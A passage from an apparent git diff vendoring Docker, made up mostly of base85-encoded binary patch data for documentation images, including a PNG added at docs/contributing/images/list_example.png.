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 literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/docs/contributing/images/list_example.png b/vendor/github.com/docker/docker/docs/contributing/images/list_example.png new file mode 100644 index 0000000000000000000000000000000000000000..2e3b59a29e7377d89e8d4b4d8d8943e24c4e7721 GIT binary patch literal 51194 zcmZU31yoyIvv!a|C>E?hac_$j3IumAP@pYPC{8KvF2UWkc(G!|A-KDg;I75p3C%WA$gBqyEK@&?uDeJ=+{vq&@=Tswl@atP~aQAW$G~B2DTR#1x>gv{_v%yblxKo zd#2VjzU6*CUik2x2tc-zC5r>)Ga9uTHJ%iz%lO(~f^9IVHvmi48<~U!s7y2(O9@PuTA_8}tJ`5+EU{3p-K4KTbQMya;Ft zT7}AOD%!*8nUv3{)c92Jgnp}^_BnPY#|Fy zM>h~QI5d>9?&Pl+_n3!sv~0#WXkMuy$fpeBWN2d7Wf{^dxf7{fgD`VR@Sl<0^wH*p zBGW}H8ydli#;bfcSY&lbcsf0XKRyuV%cJC&{9wJ5`=O6B$m=lL0Uut)J^YMDjRJQ_o$@YB&i1hM&ns^O6~o0!B`; z0J}l6Kiaj{>-JGsEO@ov3?xS?Qfhf4N&ZCr=z}(bgw{r=fvmLx)b?RIMiHaNN~Wh| zd1hgh@!lwQLyvm~a4JSKgK_E2X#*lhn_NK!KT8oMs{@pJll>$+_YD$73v5&1crNU1 z3-q-Ck!Fj(jAk=J)f9z-Q0#*4eu7>hhX%z`Q__3qj+lKX_y{BtGajKSK)ZQn=EEjB z{gZNA_#GfZ)H;iu<2hq{Q8|wV7A%OgoR}O-rd>ggG7WpH!}Zvyj4cfS8}K|aJkf=`DWxF2(Qm(yV1{D`hJE(9>OGwmbt3*=a8gKA@DU*);W<$n(Tmr|L{rT1Z_+;26>

